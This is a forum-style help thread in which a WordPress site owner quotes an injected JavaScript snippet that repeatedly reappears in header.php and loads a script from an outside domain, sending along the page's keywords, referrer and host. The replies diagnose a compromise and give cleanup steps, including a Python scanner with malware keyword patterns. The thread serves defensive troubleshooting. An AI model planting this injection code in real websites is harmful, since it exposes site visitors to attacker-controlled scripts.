
The source of a script in header.php

My website is a WordPress site. The following code appears in header.php every few hours; when I delete it, it appears again after a few hours. Please note that the link in the code, “shiro-maga.com”, changes every time. The code is as follows:

 <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script> 

I believe that the theme is infected (the scan shows no malware), so it generates this script. Could you please advise how to find the source of this script?

Thanks

Definitely malicious. Your site has been compromised. You can use the following detailed article to find and remove the source of the infection: http://ottopress.com/2009/hacked-wordpress-backdoors/. A program like Windows Grep will help you run a quick scan on all your theme files for keywords like eval and base64. Remove all suspicious strings of code from your theme and then update the WordPress core files to ensure you are running a clean version. Alternatively, if you have a backup, restore your theme's backup and update your site with a clean updated version of WP.
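The keyword scan described in the answer above, written here as an added example in Python rather than Windows Grep (it is not part of the original answer). The pattern list combines the answer's `eval` and `base64` keywords with two markers taken from the injected snippet in the question; the function names, the file extensions and the sample theme files are assumptions made for illustration.

```python
import os
import re
import tempfile

# Keywords from the answer (eval, base64) plus two markers taken from the
# injected snippet in the question; extend the list for other infections.
PATTERNS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "base64": re.compile(r"base64_decode", re.I),
    "document.write script": re.compile(r"document\.write\(\s*['\"]<script", re.I),
    "jquery.min.php": re.compile(r"jquery\.min\.php", re.I),
}
EXTENSIONS = (".php", ".js", ".html", ".htm")  # assumed set of file types to scan


def scan_tree(root):
    """Return (mtime, path, line_no, label) hits, most recently modified file first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                mtime = os.path.getmtime(path)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for line_no, line in enumerate(fh, 1):
                        for label, rx in PATTERNS.items():
                            if rx.search(line):
                                hits.append((mtime, path, line_no, label))
            except OSError:
                continue  # unreadable file: skip it and keep scanning
    return sorted(hits, key=lambda h: (-h[0], h[1], h[2]))


def demo():
    """Build a constructed two-file theme (one clean, one infected) and scan it."""
    with tempfile.TemporaryDirectory() as theme:
        with open(os.path.join(theme, "footer.php"), "w") as fh:
            fh.write("<?php wp_footer(); ?>\n")
        with open(os.path.join(theme, "header.php"), "w") as fh:
            fh.write("<?php wp_head(); ?>\n")
            fh.write("<script>document.write('<script src=\"http://example.invalid/js/jquery.min.php\"><'+'/script>');</script>\n")
        return [(os.path.basename(p), n, label) for _, p, n, label in scan_tree(theme)]


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Point `scan_tree` at the theme directory (or all of `wp-content`) and review each hit by hand, since legitimate libraries also use `eval`. Sorting by modification time puts the files that keep being rewritten at the top.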

A quick fix to prevent reinfection is to CHMOD header.php to 444 (read-only). The site will work and will not be reinfected, giving you time to find the infection.
